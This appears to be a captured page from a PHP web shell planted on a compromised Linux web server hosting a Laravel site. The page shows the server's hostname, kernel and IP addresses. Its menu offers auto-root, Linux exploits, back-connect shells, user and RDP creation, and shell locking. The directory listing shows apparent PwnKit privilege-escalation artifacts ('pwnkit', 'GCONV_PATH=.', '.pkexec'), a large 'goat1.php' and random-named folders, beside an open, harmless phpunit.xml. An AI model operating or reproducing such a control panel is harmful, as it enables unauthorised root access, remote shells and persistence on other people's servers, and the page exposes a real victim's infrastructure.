Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.169
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo3.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
Cardealer
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
a1wzpqb
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
bykgn1s
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
ejbwqtv
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
jehslzx
[ DIR ]
drwxr-xr-x
jnrzisc
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
vryoikj
[ DIR ]
drwxr-xr-x
wionhel
[ DIR ]
drwxr-xr-x
zkgbyio
[ DIR ]
drwxr-xr-x
.editorconfig
220
B
-rw-r--r--
.env
953
B
-rw-r--r--
.env.example
730
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
163
B
-rw-r--r--
.htaccess
1.96
KB
-r--r--r--
.mad-root
0
B
-rw-r--r--
.styleci.yml
174
B
-rw-r--r--
README.md
4.35
KB
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
composer.json
2.25
KB
-rw-r--r--
composer.lock
336.23
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
index.php
20.75
KB
-r--r--r--
license-xaba.php
629
B
-rw-r--r--
package-lock.json
421.37
KB
-rw-r--r--
package.json
1.27
KB
-rw-r--r--
phpunit.xml
1.37
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
85
B
-rw-r--r--
server.php
563
B
-rw-r--r--
tailwind.config.js
530
B
-rw-r--r--
webpack.config.js
150
B
-rw-r--r--
webpack.mix.js
663
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpunit.xml
<?xml version="1.0" encoding="UTF-8"?> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="./vendor/phpunit/phpunit/phpunit.xsd" backupGlobals="false" backupStaticAttributes="false" bootstrap="vendor/autoload.php" colors="true" convertErrorsToExceptions="true" convertNoticesToExceptions="true" convertWarningsToExceptions="true" processIsolation="false" stopOnFailure="false"> <testsuites> <testsuite name="Unit"> <directory suffix="Test.php">./tests/Unit</directory> </testsuite> <testsuite name="Feature"> <directory suffix="Test.php">./tests/Feature</directory> </testsuite> </testsuites> <filter> <whitelist processUncoveredFilesFromWhitelist="true"> <directory suffix=".php">./app</directory> </whitelist> </filter> <php> <server name="APP_ENV" value="testing"/> <server name="BCRYPT_ROUNDS" value="4"/> <server name="CACHE_DRIVER" value="array"/> <server name="DB_CONNECTION" value="sqlite"/> <server name="DB_DATABASE" value=":memory:"/> <server name="MAIL_DRIVER" value="array"/> <server name="QUEUE_CONNECTION" value="sync"/> <server name="SESSION_DRIVER" value="array"/> </php> </phpunit>
Close